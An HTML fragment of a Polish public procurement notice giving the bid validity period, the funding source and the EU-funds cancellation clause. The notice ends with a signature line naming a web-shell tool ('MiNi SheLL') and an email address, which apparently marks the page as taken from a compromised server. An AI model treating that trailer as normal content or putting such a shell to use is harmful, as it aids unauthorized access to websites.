<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie dofinansowane jest z Rezerwy Subwencji Ogólnej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com